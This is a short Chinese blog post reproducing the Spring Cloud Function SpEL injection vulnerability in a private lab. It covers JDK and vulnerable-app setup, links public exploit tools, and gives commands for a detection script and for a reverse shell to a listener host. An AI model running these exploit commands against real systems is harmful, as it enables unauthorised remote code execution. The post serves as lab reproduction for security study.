【Nday】Spring-Cloud-SpEL-表达式注入漏洞复现

# 环境搭建
JDK 15下载:
 
https://www.oracle.com/java/technologies/javase/jdk15-archive-downloads.html

 

 

 

在CentOS7上安装JDK 15环境
 
rpm -ivh jdk-15.0.2_linux-x64_bin.rpm

 

 

 

漏洞环境下载:
 
https://github.com/N1ce759/Spring-Cloud-Function-SPEL-RCE

 

部署漏洞环境:
 
java -jar SpringCloud-Function-0.0.1-SNAPSHOT.jar

 

 

 

# 漏洞复现
访问:http://192.168.160.146:9000/

 

 

 
工具下载地址:
 
https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE

 

 
 开始检测漏洞并反弹shell
## 检测漏洞
python3 Spel_RCE_POC.py url.txt
## 反弹shell
python3 Spel_RCE_Bash_EXP.py http://192.168.160.146:9000/ 192.168.160.241 7777

 

 

 

 

 

posted @   华中第一黑  阅读(351)  评论(0编辑  收藏  举报
相关博文:
·  渗透测试面试总结
·  关于certutil的探究-文件下载+编码分块上传上传文件再合并
·  Spring Cloud Function SPEL表达式注入漏洞漏洞复现
·  Spring Cloud Function SPEL表达式注入漏洞复现
·  Spring Cloud Function SpEL表达式RCE漏洞复现分析
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律
历史上的今天:
2021-03-29 Ubuntu所有版本下载及更新源
点击右上角即可分享
微信分享提示
AI IDE Trae